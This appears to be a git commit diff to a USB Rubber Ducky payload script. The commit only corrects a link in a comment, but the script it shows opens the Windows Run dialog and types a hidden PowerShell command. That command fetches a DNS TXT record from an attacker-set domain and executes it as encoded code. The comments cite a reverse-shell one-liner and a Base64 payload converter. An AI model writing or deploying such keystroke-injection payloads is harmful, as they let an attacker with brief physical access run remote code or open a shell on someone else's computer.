Update DNS-TXT-CommandInection.txt
parent
1db132c3ac
commit
b4978b7b47
|
@ -27,7 +27,7 @@ REM Encoded: "aQByAG0AIABoAHQAdABwADoALwAvAGUAeABhAG0AcABsAGUALgBjAG8AbQAvAF
|
|||
REM ShoutOut: powershell reverse shell one-liner by Nikhil SamratAshok Mittal @samratashok. See link below.
|
||||
REM https://gist.github.com/egre55/c058744a4240af6515eb32b2d33fbed3
|
||||
REM The link below has the Powershell script to convert your payloads to Base64.
|
||||
REM https://
|
||||
REM https://https://github.com/nathansb2022/usbrubberducky-payloads/blob/master/payloads/library/execution/DNS-TXT-CommandInection/convertBase64.ps1
|
||||
|
||||
DELAY 1000
|
||||
GUI r
|
||||
|
@ -35,4 +35,3 @@ DELAY 1000
|
|||
STRING powershell /w 1 $a=(resolve-dnsname MY_TARGET_URL TXT).strings;powershell -e $a
|
||||
DELAY 500
|
||||
ENTER
|
||||
|
||||
|
|
Loading…
Reference in New Issue